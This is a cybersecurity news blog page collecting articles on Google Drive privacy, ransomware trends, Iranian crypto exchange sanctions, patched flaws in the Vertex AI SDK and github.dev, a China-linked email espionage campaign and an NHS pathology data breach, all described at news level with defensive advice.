Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Technology
cloud storage security End-to-End Encryption Google Drive encryption Google Drive privacy Google Drive security Technology

Why Privacy-Conscious Users Should Think Twice Before Storing Sensitive Files on Google Drive

 

Google Drive has become an essential tool for millions of users worldwide. Whether it's storing contacts, backing up WhatsApp chats, or saving photos, videos, and important documents, the platform serves as a central hub for digital storage. Its deep integration with Google's ecosystem makes it a convenient choice for Android and Gmail users alike.

However, while Google Drive offers robust security against cyber threats, questions remain about whether it is the best place to store highly sensitive personal information. Documents such as passport scans, banking records, legal contracts, and tax returns may require an additional layer of protection beyond what the service provides by default.

From a security standpoint, Google Drive employs industry-standard safeguards. Data is encrypted while being transferred using TLS protocols, and files stored on Google's servers are protected with AES-128 encryption. Users can further strengthen account security through features like passkeys and two-factor authentication.

The key concern, however, lies in how the encryption system works. Unlike services that provide end-to-end encryption, Google retains control of the encryption keys used to access stored files. This means the company has the technical ability to decrypt and view user data when necessary.

"When you upload a file, Google encrypts it with a unique data encryption key, then encrypts that key with another key it controls, and stores both on its servers. To read the file, Google's systems unwrap the keys on the fly. With true end-to-end encryption, only your device holds the key, so even the service provider sees nothing but scrambled bytes. Google's setup doesn't meet that bar."

As a result, while hackers and unauthorized third parties face significant barriers in accessing files, Google itself can access stored content. Additionally, government agencies or courts may compel the company to share user data through legal processes because Google possesses the necessary decryption keys.

Another privacy consideration is automated content scanning. Google uses systems that review files for policy enforcement purposes, including identifying known illegal content and potential violations of its terms of service. Although the company states that Drive content is not used for advertising purposes, automated systems can sometimes generate false positives, potentially leading to account restrictions or suspensions.

Artificial intelligence is also expanding Google's access to stored data. As Gemini becomes more deeply integrated into Workspace products, it requires permission to analyze files in order to generate summaries and provide contextual assistance. While Google maintains that Drive files are not used to train its general AI models, some privacy advocates argue that increased AI integration broadens the potential exposure of personal information.

"This doesn't mean Google is malicious or will snoop on you. It means the threat model is different from what most people assume. You're not just trusting Google to fend off hackers; you're trusting it never to read, mishandle, or be compelled to share your data."

For users seeking stronger privacy protections, encrypting files before uploading them to Google Drive is often recommended. Applications such as Cryptomator allow users to create encrypted vaults on their devices, ensuring that files remain unreadable to Google. VeraCrypt is another option that enables users to create secure encrypted containers that can be synced to cloud storage services.

Those looking for built-in privacy protections may consider alternative platforms. Services such as Proton Drive, Tresorit, and Sync.com offer end-to-end encryption, ensuring that providers cannot access the contents of user files because they do not possess the decryption keys.

There are trade-offs, however. End-to-end encrypted files often cannot be searched by content, previewed in a browser, or edited collaboratively in the same way as standard cloud storage files. Additionally, users are solely responsible for managing recovery credentials, meaning forgotten passwords may result in permanent loss of access.

For particularly sensitive documents, some users may choose to avoid cloud storage altogether. External hard drives or self-hosted solutions such as Nextcloud can provide greater control over personal data while reducing dependence on third-party providers.

Despite these concerns, Google Drive remains a secure and practical solution for everyday storage needs, including photos, shared documents, and routine work files. The issue is less about security and more about privacy.

"The privacy story shifts when you start storing things that would hurt to lose to a stranger, a Google reviewer, or a court order. For those files, the answer isn't to abandon Drive but to stop treating it as a vault. Encrypt sensitive documents before you upload, or move them to a service that can't read them at all. The few minutes of friction are worth knowing that the most personal pieces of your life aren't sitting on a server with someone else's keys."

For privacy-focused users, the best approach may be to continue using Google Drive for convenience while reserving encrypted storage solutions for highly confidential files.

Read more »
Splinter Groups
Cyber Crime Met Police Ransomware Splinter Groups

Ransomware Gangs Splinter as Cyber Threat Becomes More Volatile

 

Cybercrime is moving through a major reset as the ransomware world shifts away from big, organized cartels and toward smaller, more volatile splinter groups. Speaking at Infosecurity Europe 2026, William Lyne, Head of Economic and Cybercrime at the Metropolitan Police Service, said the underground market has become a highly accessible ecosystem where criminals can buy tools, services, and stolen data with ease. He described it as a place where threat actors can get almost everything they need, except a good drink. 

The biggest driver behind this change is convenience. Cryptocurrencies have removed one of the oldest bottlenecks in cybercrime by making it much easier to cash out illegal profits, while underground marketplaces now provide ransomware kits, phishing services, infrastructure, and support on demand. That lower barrier to entry has blurred the old lines between hacktivists, criminal gangs, and state-linked actors, creating a blended threat environment that is far more crowded and harder to police.

Lyne warned that law enforcement crackdowns are also reshaping the market. When large, centralized groups such as LockBit are disrupted, their affiliates do not disappear; they scatter into smaller factions, each trying to rebuild revenue streams in a less visible way. The result is a more fragmented and “post-trust” criminal scene, where weaker internal controls and looser coordination can make attackers more aggressive, reckless, and unpredictable. 

The threat is also becoming more global. Lyne said the ransomware ecosystem is no longer dominated by traditional Russian-speaking hubs, with actors now emerging from Brazil, Türkiye, and English-speaking groups such as Scattered Spider. At the same time, criminals are increasingly using AI to search through hoarded corporate data, turning old thefts into fresh extortion opportunities and new monetization schemes. 

For police and security teams, the response must go beyond arrests alone. Lyne said the Met Police cannot “arrest its way out” of the problem and instead needs to focus on disrupting infrastructure, weakening trust inside criminal networks, and working more closely with private-sector defenders. In practical terms, that means security teams should expect a ransomware landscape that is smaller in structure but sharper in impact, where fragmented gangs may strike faster and with fewer rules than the cartels they replaced.
Read more »
Terrorist Financing
Crypto Compliance Cryptocurrency Sanctions Cyber Security Digital Asset Security Iranian Crypto Exchanges IRGC Cryptocurrency Nobitex Sanctions OFAC Sanctions Sanctions Evasion Terrorist Financing

Iranian Crypto Giant Nobitex Added to US Sanctions List Amid Terror Financing Probe

 


The intersection of financial innovation, regulatory oversight, and national security has occupied digital asset platforms for years. Earlier this week, the U.S. Department of Treasury’s Office of Foreign Assets Control (OFAC) imposed sanctions on Nobitex, Iran’s largest cryptocurrency exchange, as well as three other Iranian digital asset exchanges. This convergence brought the convergence into sharp focus. 

A significant concern of the Trump Administration is that cryptocurrency infrastructure is being abused both to circumvent international sanctions and to facilitate illicit financial networks associated with government-backed activities, which is reflected in the action taken as part of its Economic Fury campaign. 

Nobitex is allegedly processing more than half of Iran's cryptocurrency inflows by 2025, according to United States authorities, establishing itself as one of Iran's most important digital asset ecosystem hubs. This platform facilitates transactions related to terror financing, sanctions evasion operations, and entities associated with the Islamic Revolutionary Guard Corps (IRGC), including ransomware-related entities. 

According to Treasury officials, the platform was also instrumental in enabling the Central Bank of Iran to obtain substantial stablecoin reserves, highlighting how digital assets are increasingly being used to influence geopolitical and economic affairs. Even though Iran has been economically isolated for many years and has been undergoing mounting geopolitical tension, the digital asset sector has emerged as a significant financial ecosystem. 

Based on industry estimates, the cryptocurrency market in the country will be worth over $7.78 billion in 2025, reflecting the growing integration of digital assets into both commercial activities and international payment channels. 

Based on blockchain intelligence assessments, it is evident that wallet addresses associated with the Islamic Revolutionary Guard Corps (IRGC) accounted for more than half of the total value flowing into Iran's cryptocurrency ecosystem during the fourth quarter of 2025. In this regard, the country’s expanding virtual asset landscape has become increasingly intertwined with national security concerns. Within this environment, exchanges targeted by Washington occupy a dominant position. 

According to Treasury data, Nobitex processed more than 50% of all Iranian digital assets inflows during 2025, whereas Wallex and Bitpin handled approximately 12% and 10%, respectively. Since its establishment in 2018, Ramzinex has facilitated more than $2.45 billion in cumulative transactions, making it one of the nation's longest-running platforms. The figures illustrate why US policymakers have focused on the enforcement of sanctions on virtual asset service providers in recent years. Increasingly, digital asset networks have emerged as alternatives to conventional financial controls for moving capital, settling transactions, and maintaining access to global liquidity.

Iranian financial institutions are largely excluded from international banking mechanisms, including SWIFT. It has been argued that these platforms have served as critical entry and exit points connecting domestic actors to international cryptocurrency markets, creating pathways through which sanctions may be evaded and funds may be transferred across borders. 

OFAC has announced the latest measures as part of a larger campaign that has already frozen approximately half a billion dollars of cryptocurrency connected to the Iranian regime. A strategic move by Washington to target the country's largest exchanges and associated infrastructure is intended to disrupt the digital financial channels through which sanctioned entities can convert, transfer, store, and repatriate value through the cryptocurrency ecosystem, extending the reach of traditional sanctions into a decentralized financial world. 

The Treasury's latest action, which builds on these allegations, targeted not just a single exchange, but what it describes as a broader cryptocurrency infrastructure network underpinning Iran's access to global digital asset markets. In addition to Nobitex, sanctions were also imposed on Iranian exchanges Wallex, Bitpin, and Ramzinex, as well as several senior executives and Nobitex founders.

Washington identified Amir Hossein Rad as a key figure within the platform's leadership structure, in addition to being the company's chairman and co-founder. The Treasury contends that Nobitex is more significant than just its market share, alleging that the exchange was a critical financial gateway for state-linked entities, facilitating transactions associated with sanctions evasion, IRGC-related activities, ransomware activity, and the movement of assets controlled by the government. Aside from that, the department also claimed that the platform enabled the Central Bank of Iran to access stablecoins worth hundreds of millions of dollars at a time when authorities were seeking a means of supporting the weakening rial and maintaining access to international liquidity channels outside traditional banking channels. 

As outlined by the Treasury Department, the exchange also facilitated access to overseas cryptocurrency platforms for Iranian officials, individuals with political connections, and affiliated entities despite decades of financial restrictions. Furthermore, US authorities claimed that, following the onset of American military operations involving Iran, Nobitex provided transfers of government assets and safeguarded them during periods of domestic internet disruption, demonstrating the growing strategic significance of digital asset networks during geopolitical crises. 

Among the sanctions included in the package were co-founders Mohammad Ali Aghamir and Mohammad Aghamir, who heads the blockchain division of the company, in which the Treasury asserted that both maintain close ties to influential Islamic circles. The company's chief executive officer, Seyed Ali Khoei, was also designated as a sanctioned individual due to his significant leadership role. 

Aside from Nobitex, Washington identified Wallex as the second largest cryptocurrency exchange by trading volume in Iran, alleging that it accounted for approximately 12 percent of the country's digital asset inflows in 2025 as well as facilitating transactions related to the IRGC. The Treasury officials indicated that Bitpin processed approximately 10 percent of Iranian digital asset inflows during that same period, and some investors involved in efforts to circumvent US sanctions were allegedly involved. 

In contrast, Ramzinex has been accused of processing transactions worth more than $2.45 billion since its inception in 2018 as well as participating in transactions involving entities associated with the Iranian government and the Islamic Revolutionary Guard Corps. Washington intends to target not only individual actors, but also the digital financial infrastructure that Tehran believes allows it to access, transfer, and repatriate funds beyond conventional sanctions enforcement mechanisms in an effort to combat this threat. 

Cryptocurrencies are becoming a critical frontier in modern financial security as geopolitical conflict, sanctions enforcement, cybercrime, and digital finance increasingly intersect. In an era when regulators are increasingly paying attention to virtual asset ecosystems beyond traditional banking networks, exchanges and financial service providers are facing increased scrutiny over compliance controls, transaction monitoring, and exposure to jurisdictions with high risk.

In the context of cybersecurity and financial security professionals, this development underscores that digital asset infrastructure is not solely viewed as a technological innovation, but also as a strategic component of national security, a phenomenon which makes transparency, risk management, and threat intelligence more critical than ever in an increasingly interconnected financial environment.
Read more »
Meta Security
Cyber Security Cyber Security Ransomware Attacks Cyber Threats Cyberattacks Data Breach Threat data security Hacktivism Meta Meta Security

META Threat Landscape Report Q1 2026: Ransomware, Data Breaches and Hacktivism Rise Across Middle East, Turkey and Africa

 

Early 2026 saw sharper cyber aggression throughout the Middle East, Turkey, and Africa, fueled less by isolated incidents than by coordinated ransomware attacks, politically charged hacking efforts, and repeated exposure of sensitive information. Notably, Cyble's regional analysis highlights how public institutions, financial entities, infrastructure firms, and power providers faced relentless pressure from diverse digital adversaries during those months. Amid shifting tactics, one pattern held steady - attack volume climbed without pause. Early in the year, ransomware kept gaining ground across the region. 

Across META nations, 116 cases came to light between January and March. Leading the list was Turkey, with the UAE trailing just behind. Intrusions hit South Africa and Egypt hard, too - frequent probes and breakdowns marked their networks. Known crews like Gentlemen, INC Ransom, Qilin, Tengu, and LockBit stayed busy through the period. Each group showed steady signs of operation during those months. What stands out is construction being hit hardest, then government offices, police departments, banks, and power companies. Because these sectors manage vital systems and confidential information, they draw hackers aiming to profit or cause chaos. 

Notably, ransomware crews are acting more like businesses - some run subscription-style services so partners can launch attacks faster and wider. Terabytes of sensitive files surfaced online, allegedly pulled from Qatar’s energy infrastructure - login details, cloud backups, all circulating without permission. While ransomware grabbed headlines, leaked datasets kept spreading just beneath the surface. Cyber bazaars active throughout the year moved quietly, swapping access tokens and corporate records like currency. Healthcare providers found themselves exposed. So did hotels, sports leagues, even digital influencers promoting brands. 

A single hacker boasted control over massive archives - one claim among many. State agencies showed up repeatedly in breach reports, their systems probed by actors with unclear allegiances. Motives varied: some sought profit, others appeared driven by surveillance goals or national interests. What stands out is how often attackers used known weaknesses to break into systems. Soon after flaws became public, they appeared in hacking attempts - some quickly listed by CISA as actively abused. Targeting focused heavily on corporate networks, defensive software, besides services open to the web. 

One standout issue involved Ivanti’s mobile management tool, where a severe bug allowed remote control without login verification. Access like that remains appealing; it skips the need to harvest passwords entirely. Throughout Q1 2026, hacktivism stayed prominently in view. A steady flow of leaked data, altered websites, and network floods hit thousands of online addresses in the META area. Tied closely to simmering global conflicts, especially around Israel and Iran, these actions grew more frequent. Rather than just causing outages, they began serving as tools to push narratives into online conversations. Digital platforms turned into stages where cyber acts echoed real-world disputes. 

Though quiet at first glance, new data from Cyble’s META Threat Landscape Report reveals how quickly digital dangers shift when crime blends with global tensions. Where politics and networks meet, risks climb - especially for firms tied to essential services or disputed industries. Instead of waiting, many now see value in tracking hidden signals, patching weaknesses faster, not just reacting after breaches occur. 

As hostile actors refine methods across the Middle East, Africa, Turkey, and Asia, one thing becomes clear: staying ahead means seeing more, acting sooner, adjusting constantly.
Read more »
Vertex AI
AI ethics cloud storage Data Harvesting SDK Google Google OAuth Python technology Vertex AI

Security Bug in Google Vertex AI Could Allow Model Upload Hijacking

 




Google has addressed a security flaw in the Python SDK for Vertex AI after researchers demonstrated that attackers could potentially intercept machine learning model uploads and substitute them with malicious files.

The issue was identified by researchers from Palo Alto Networks' Unit 42 team, who disclosed the findings through Google's bug bounty program. According to the researchers, the vulnerability could be exploited without compromising a target organization's cloud environment, stealing credentials, or tricking users through phishing campaigns. Instead, the attack relied on weaknesses in how the SDK handled temporary storage locations during model uploads.

Researchers referred to the technique as "Pickle in the Middle." They reported no evidence that the flaw had been exploited outside of controlled testing environments. Google has since released security updates, and organizations using Vertex AI are advised to upgrade to version 1.148.0 or newer.


Predictable Storage Names Created an Opening

The vulnerability originated from the SDK's automatic staging process.

When developers uploaded a machine learning model without manually specifying a Cloud Storage bucket, the SDK generated a temporary bucket name based on information such as the Google Cloud project identifier and deployment region.

The problem was not that the bucket name could be predicted. The problem was that the SDK only checked whether the bucket existed. It did not verify whether that bucket belonged to the project performing the upload.

Because Cloud Storage bucket names are globally unique across Google Cloud, an attacker could create the expected bucket before the victim did. If that happened, model files uploaded by the victim could be redirected into infrastructure controlled by the attacker.

In practical terms, a developer could believe a model was being uploaded to their own cloud environment while the files were actually being delivered elsewhere.


Attackers Could Replace Models Before Deployment

After receiving the uploaded files, an attacker could modify or replace the model before Vertex AI retrieved it for deployment.

This becomes particularly important because many machine learning workflows rely on serialization formats such as Pickle and Joblib. These formats are commonly used to save trained models, but they also contain functionality capable of executing instructions when the file is loaded.

As a result, a manipulated model may do more than generate predictions. It can potentially run arbitrary code inside the environment responsible for serving the model.

Unit 42 researchers demonstrated that this behavior could be abused to execute attacker-controlled code inside Vertex AI's serving infrastructure.


Researchers Exploited a Narrow Timing Window

The attack required the malicious file replacement to occur very quickly.

During testing, researchers observed that Vertex AI typically retrieved uploaded files roughly 2.5 seconds after the upload process completed.

To exploit this short interval, they created an automated Cloud Function that monitored the attacker-controlled bucket and immediately replaced newly uploaded files. The replacement process took approximately 1.4 seconds, allowing the malicious model to be swapped before Vertex AI accessed it.

This timing-based attack demonstrated that the vulnerability was practical under the right conditions rather than being a purely theoretical risk.


Proof-of-Concept Reached Beyond a Single Model

After achieving code execution, researchers tested what level of access could be obtained from the serving environment.

Their proof-of-concept extracted an OAuth token from the container's metadata service and used it to interact with resources available within Google's managed infrastructure.

According to the report, the token provided visibility into additional machine learning assets, model artifacts, TensorFlow files, BigQuery metadata, access control information, system logs, Kubernetes cluster identifiers, and internal infrastructure references.

The findings suggested that a successful compromise could potentially expose information beyond the originally targeted model deployment.


Exploitation Required Specific Conditions

The vulnerability was not universally exploitable.

Researchers noted that two requirements had to be met before the attack could succeed.

First, the expected default staging bucket could not already exist in the chosen deployment region. Second, the developer needed to rely on the SDK's default bucket-generation behavior rather than specifying a storage bucket manually.

The researchers noted that newly created Vertex AI projects often satisfy the first condition because the default bucket may not yet have been created.


Google Introduced Multiple Fixes

Unit 42 reported the issue to Google on March 5, 2026.

Google's initial response introduced additional randomness into bucket names by appending a UUID value, making bucket prediction substantially more difficult.

The company later strengthened the mitigation by implementing ownership validation checks. These checks ensure that automatically selected buckets belong to the project initiating the upload, preventing bucket-squatting attacks from succeeding.

The ownership verification mechanism was included in Vertex AI SDK version 1.148.0.

At the time the researchers published their findings, neither Google's Vertex AI security advisories nor the research report listed a CVE identifier for the vulnerability.


Recommendations for Organizations

Security teams using Vertex AI should verify that all environments are running updated versions of the google-cloud-aiplatform package. This includes development notebooks, machine learning pipelines, automated build systems, testing environments, and production deployments.

Researchers also recommend explicitly defining a staging bucket owned by the organization instead of relying on SDK defaults. This reduces the risk of storage misconfigurations and provides greater visibility into where machine learning artifacts are stored during deployment.

The disclosure is the latest example of how weaknesses in supporting cloud infrastructure can affect AI systems. As organizations continue moving model development and deployment into managed cloud platforms, security reviews must extend beyond the model itself to include storage, deployment pipelines, permissions, and the services that support the AI lifecycle.

Read more »
Cyber Crime
Blockchain Security CertiK Report Crypto Thieves Cyber Crime

Crypto Exploit Losses Plummet 90% in May to $68.3 Million as Thieves Hit Security Wall

 

Crypto thieves are hitting a major wall, with exploit losses plunging nearly 90% in May 2026. Blockchain security firm CertiK reported that crypto platform losses fell to $68.3 million last month, a dramatic drop from the staggering $650 million stolen in April. This sharp decline signals improved security measures across the industry and represents the third month in 2026 where losses stayed below $100 million. 

Code vulnerabilities were responsible for the bulk of May's damage, accounting for roughly 66% of total losses at approximately $45 million. Cross-chain bridges took the heaviest hit by category, absorbing 42% of total losses or $28.6 million. Despite the marked decrease, the sector wasn't entirely free from high-profile incidents, though the overall attack success rate has significantly diminished compared to previous months. 

The positive trend reflects multiple factors working together to protect crypto assets. Improved security measures and rapid response capabilities are driving this improvement, even as vulnerabilities persist across the ecosystem. CertiK's data shows that attackers are facing stronger defenses, with platforms implementing more robust protection systems and responding faster to emerging threats. This defensive upgrade is forcing crypto thieves to "hit a wall" as their traditional exploit methods become less effective. 

May 2026's performance stands in stark contrast to the previous quarter's chaos. The nearly 90% drop demonstrates that the industry is learning from past mistakes and adapting quickly to attack vectors. While $68.3 million in losses remains concerning, the trajectory is clearly positive, with monthly losses trending downward consistently through early 2026. Investors and platform operators are seeing tangible benefits from increased security investments. 

This security improvement offers hope for the cryptocurrency industry's long-term viability. As platforms strengthen their defenses and response times, the success rate for exploits continues declining. The trend suggests that crypto thieves are struggling to adapt to newer security protocols, marking a turning point in the ongoing battle between attackers and defenders. While attacks will continue, the dramatic reduction in losses indicates the industry is finally building effective walls against digital theft.
Read more »
cybersecurity attacks
CIS Cyber Attacks Cyber Criminals Cyber Gangs Cyber Security Ransomware Attacks cybercrime gangs cybersecurity attacks

Ransomware Gang Apologizes After Mistakenly Attacking CIS Company and Revealing Criminal Errors

 

Surprisingly, even cybercriminal collectives slip up sometimes - a fact highlighted when attackers struck a business inside a CIS country. A misstep by Nova, tied to the RAlord network, led to unintended consequences. Following an accidental hit on Eriell Group - an oilfield services leader based in Tashkent with operations extending into Russia - affiliates backtracked publicly. The group formally expressed regret over targeting such a firm. Apologies emerged only after internal protocols appeared breached. Mistaken identity seems to have triggered the reversal. Trust among criminal actors likely took a quiet blow. 

Reports indicate that after Eriell reached out to Nova, alerting them to the mistake, the link between the operator and the group was cut. Banned soon afterward, the individual involved lost access entirely. Instead of resistance, there came an apology - structured, deliberate. Assistance followed, provided freely, framed as support rather than restitution. Their stance: encryption never happened, data remains unpublished, intent unclear but outwardly cooperative. Still, the unwritten code among major ransomware groups holds: steer clear of Russian and broader CIS networks. 

Even though hacking violates local laws there, officials routinely ignore profit-driven breaches if they spare homegrown entities. Some hacking collectives like DragonForce, VanHelsing, and LockBit ban strikes on Russian-linked targets. Despite that, the Nova member tied to the Eriell breach probably won’t earn trust among peers again quickly. Though rules exist, breaking unwritten loyalties carries consequences few overlook. It's happened before - threat actors stumbling through avoidable errors. 

Back then, a ransom-driven team called Scattered Lapsus$ Hunters announced full control over Resecurity, a firm focused on digital defense, boasting they’d extracted every piece of stored information. In reality, their intrusion led straight into a trap set long in advance: a decoy system designed to mislead. That slip gave authorities what they needed - not just tracking one participant but securing legal grounds to pursue evidence further. 

Besides earlier cases, attention turned to CyberVolk - a pro-Russian hacktivist collective - that rolled out ransomware yet embedded the primary decryption keys directly within the code. Because of this oversight, those affected found a way to unlock data freely, bypassing any payment. Mistakes like these undermined the entire scheme before it gained traction. Wrong moves in coding sometimes backfire. 

The team behind Sicarii built a system that made fresh encryption keys on each launch - yet wiped the matching private key right after. Because of this, users had no way to unlock data, payment or not. In another case, Nitrogen’s tool failed due to a nearly identical error, leaving its decryption method useless. Paying up became meaningless when recovery was impossible by design. Certain missteps reveal a different side - those behind cyberattacks aren’t flawless. 

Though often seen as highly skilled, people running ransomware schemes act mainly for money; yet just like others, they slip up, leaving openings that can unexpectedly help those targeted.
Read more »
UNC6508
China cyber espionage Google Threat Intelligence Group INFINITERED malware REDCap UNC6508

China-Linked Cyber Espionage Group Secretly Harvested Research and Defense Emails from North American Institutions

 

A sophisticated cyber espionage campaign linked to China infiltrated research, healthcare, academic, and military organizations across North America, remaining undetected for more than a year while stealing sensitive information and defense-related communications.

According to a recent report from Google’s Threat Intelligence Group (GTIG), the campaign has been attributed with high confidence to a threat cluster identified as UNC6508. The attackers gained access through compromised REDCap (Research Electronic Data Capture) servers and later leveraged built-in Google Workspace features to quietly collect targeted emails.

The threat actor and its custom malware, known as INFINITERED, were previously highlighted by Google in February during a broader assessment of state-sponsored attacks targeting the defense industry. While the affected organizations were not publicly named, the victims reportedly included healthcare providers, universities, military medical institutions, advocacy organizations, and regulatory agencies in the United States and Canada. Google stated that it alerted impacted entities and took action against the attackers’ infrastructure.

The attackers targeted externally accessible REDCap servers, a widely used platform that helps hospitals, research institutions, and universities manage study data and databases.

Although Google has not identified the precise method used to gain initial access, nor linked the activity to a specific vulnerability or CVE, investigators observed the group scanning older REDCap versions known to contain security weaknesses.

Roughly three months after breaching the servers, UNC6508 deployed INFINITERED, a customized malware strain designed to modify REDCap system files. The malware ensured long-term persistence by embedding itself into the platform’s update process, allowing malicious code to survive future software upgrades.

INFINITERED also captured usernames and passwords entered through REDCap login portals and stored the stolen credentials in encrypted form within local databases. Additionally, the malware functioned as a backdoor, accepting commands through HTTP cookies and executing them whenever users loaded web pages.

Researchers traced the earliest known compromise to September 2023, with malicious activity continuing through November 2025. After establishing a foothold, the attackers conducted network reconnaissance, collected database and service account credentials, and eventually escalated privileges to obtain domain administrator access.

Rather than deploying a separate data-exfiltration tool, the attackers exploited an existing Google Workspace administrative capability known as content compliance rules.

These rules are typically used by organizations to monitor emails for specific keywords and automatically apply actions such as forwarding or copying messages. UNC6508 created a malicious rule named "Patroit" that monitored nearly 150 keywords, email addresses, and search terms associated with its intelligence-gathering objectives.

Whenever an email matched the predefined criteria, Google Workspace automatically sent a hidden copy to an attacker-controlled Gmail account. Google has since disabled the account involved in the operation.

This technique allowed the threat actors to collect sensitive communications without installing malware on mail servers or generating suspicious network traffic. Instead, they relied entirely on legitimate cloud-based functionality to siphon information.

While email-forwarding rule abuse is already recognized within the MITRE ATT&CK framework, GTIG noted that using domain-level content compliance rules for espionage represented a previously unseen tactic among China-linked cyber actors.

Analysis of the monitoring rules revealed that UNC6508 was particularly interested in subjects related to geopolitical strategy, military technologies and equipment, artificial intelligence, autonomous and uncrewed systems, offensive cyber operations, and medical research.

One especially notable keyword was "chikungunya," a mosquito-borne disease linked to a significant outbreak in China's Guangdong province during 2025, suggesting the group's collection interests extended into public health and epidemiological research.

Security teams are advised to immediately update internet-facing REDCap servers and completely remove outdated software versions. Because REDCap allows multiple versions to operate simultaneously, legacy installations can create opportunities for downgrade attacks that exploit known vulnerabilities.

Organizations should also review Google Workspace and other cloud email environments for unusual content compliance rules, unauthorized mail forwarding settings, and external BCC destinations. Administrative audit logs should be examined to identify when rule changes occurred and who made them.

Google has also published indicators of compromise associated with INFINITERED, which defenders can use to search for signs of intrusion within their environments. Implementing phishing-resistant multi-factor authentication (MFA) for administrator accounts is another critical step, as the email theft operation ultimately depended on obtaining elevated administrative privileges.

Although investigators have not yet determined exactly how UNC6508 initially compromised the REDCap servers, the campaign demonstrates how legitimate cloud administration features can be weaponized once attackers gain sufficient access. As a result, organizations must monitor not only malware and network activity but also the misuse of trusted enterprise tools that can quietly facilitate data theft.

Read more »
Zero day
Authentication Tokens CVE Data Breach GitHub Access Token malicious VS Code extensions Microsoft vulnerability Zero day

Researcher Reveals VS Code Flaw That Could Expose GitHub Access Tokens Through a Single Click

A publicly disclosed security flaw affecting the browser-based version of Visual Studio Code has drawn attention from developers after a researcher demonstrated how attackers could potentially obtain GitHub authentication tokens through a single user interaction.

The issue was disclosed by security researcher Ammar Askar, who published technical details alongside proof-of-concept code showing how the vulnerability could be abused. At the time of disclosure, no CVE identifier had been assigned and Microsoft had not released an official software patch.

According to Askar's analysis, the weakness exists within github.dev, GitHub's web-based development environment that allows users to work with repositories directly from a browser using technology derived from Visual Studio Code. The attack takes advantage of the way VS Code's webview components communicate with the main editor environment.

Webviews are embedded browser windows used by extensions and web applications to display interactive content. While these components are designed to operate within restricted environments, the researcher found a method to abuse the message-passing mechanism that connects a webview to the editor interface.

The published demonstration shows how malicious JavaScript running inside a webview can trigger actions within the main editor window. By simulating keyboard input and user activity, the code can install a malicious extension without requiring the victim to manually perform the installation process.

Once deployed, the extension is capable of extracting a GitHub OAuth token that is transmitted when users access github.dev. OAuth tokens act as authorization credentials that allow applications to interact with GitHub services on behalf of authenticated users.

According to the researcher, the security concern extends beyond access to a single repository. The token passed to github.dev can inherit the permissions associated with the user's GitHub account, potentially granting access to every repository available to that account, including private projects.

Using the proof-of-concept attack, a malicious extension can retrieve the token and communicate with GitHub's API. This allows an attacker to identify repositories accessible to the compromised account and gather information about private development resources.

Askar argued that the broad permissions associated with the token significantly increase the potential impact of exploitation because access is not limited to the repository that initially triggered the github.dev session.

To reduce exposure while no official fix was available, the researcher advised users to clear cookies and locally stored site data associated with github.dev. Removing this stored data forces additional authentication checks that can help expose suspicious sign-in attempts.

After clearing the stored information, users attempting to access github.dev through a malicious link would be more likely to encounter a warning indicating that the GitHub Repositories extension is requesting authorization through GitHub. Such prompts can serve as an indication that unexpected account access is being requested.

The disclosure also highlighted ongoing tensions surrounding vulnerability reporting processes. Askar stated that GitHub was notified approximately one hour before publication of the research. He described the disclosure as a deliberate decision to release the information publicly rather than pursue a lengthy coordinated disclosure process.

The researcher cited previous interactions involving another VS Code vulnerability that he reported through Microsoft's security channels. According to his account, the issue was later addressed without attribution and was classified as having no security impact despite his concerns regarding its implications.

Askar said that experience influenced his decision to publicly disclose future VS Code security findings rather than continue working through Microsoft's reporting process.

The incident follows several other public disclosures involving Microsoft products by an independent researcher operating under the online alias "Nightmare Eclipse." Over recent months, that researcher has released details regarding multiple unpatched vulnerabilities affecting Windows and related Microsoft technologies, including flaws known as BlueHammer, RedSun, GreenPlasma, MiniPlasma, YellowKey, and UnDefend.

Some of those vulnerabilities were later reported as being actively exploited, further intensifying discussions within the security community about vulnerability handling, disclosure timelines, and communication between vendors and independent researchers.

Microsoft previously responded to some of those disclosures by warning that legal action could be considered when individuals engage in activities that cause harm to customers. The company also stated that it may cooperate with law enforcement agencies when necessary.

In comments provided following the publication of the VS Code findings, Microsoft emphasized the role independent researchers play in improving product security. The company stated that it remains committed to evaluating reported issues, coordinating engineering responses, and delivering mitigations intended to protect customers.

A subsequent statement from Microsoft indicated that the issue had been mitigated within its services and that users were not required to take additional action.

The developer-focused platforms remain attractive targets because authentication tokens can provide access to source code repositories, development environments, and organizational assets. Security teams generally recommend reviewing unexpected links carefully, limiting unnecessary permissions, monitoring account activity, and using strong authentication controls to reduce the likelihood of unauthorized access.

Read more »
Healthcare
affected patients Breach Cyber Breach Cyber Security Healthcare

Healthcare Cyber Breach Raises Concerns After 33,000 Patients Affected

 


Initially perceived as a supply-chain disruption within the UK healthcare ecosystem, the ransomware attack has now revealed an even more severe and long-lasting impact on patient privacy. A cybercriminal attack on pathology services provider Synnovis two years ago has caused Bedfordshire Hospitals NHS Foundation Trust to confirm that sensitive data related to over 33,000 individuals has been stolen and published. 

The exposed records come from administrative pathology files associated with laboratory and diagnostic testing conducted between 2011 and 2020, and may contain personal information and clinical test results. 

 Despite the fact that ransomware incidents have long been associated with operational disruption, they present long-term data protection challenges for healthcare organizations. Moreover, attacks on critical third-party suppliers supporting essential NHS services pose cascading risks. Following the June 2024 ransomware incident, Synnovis and relevant healthcare organizations conducted an extensive forensic review to determine the extent of the exposure. 

Bedfordshire Hospitals Foundation Trust informed the affected individuals after receiving confirmation that data associated with approximately 32,927 patients had been identified in material exfiltrated by the attackers and distributed on dark web sites. According to the trust, delayed disclosure was primarily driven by the complexity of the investigation rather than a newly discovered breach. This compromised dataset consisted of fragmented administrative records dispersed across several sources, as opposed to conventional datasets stored in structured repositories. For the contents and organizational ownership of these files to be determined, more than a year of specialist analysis was required. 

According to the review, historical pathology-related information spanning nearly a decade predating November 2020 may have been exposed, including patient names, dates of birth, NHS and patient identification numbers, postcodes, and diagnostic test results. Researchers find it difficult to assess cyber incidents involving unstructured healthcare data due to the difficulty of accurately mapping stolen information before the full impact can be understood on affected individuals. After notifications had been sent to the affected individuals, the focus shifted from forensic reconstruction to risk mitigation. 

Bedfordshire Hospitals Foundation Trust urged patients to remain vigilant for suspicious communications, advising them not to respond to unexpected requests for personal information, to avoid opening attachments or links from sources that are unfamiliar, and to be cautious when receiving unsolicited phone calls, emails, or text messages that reference healthcare information. 

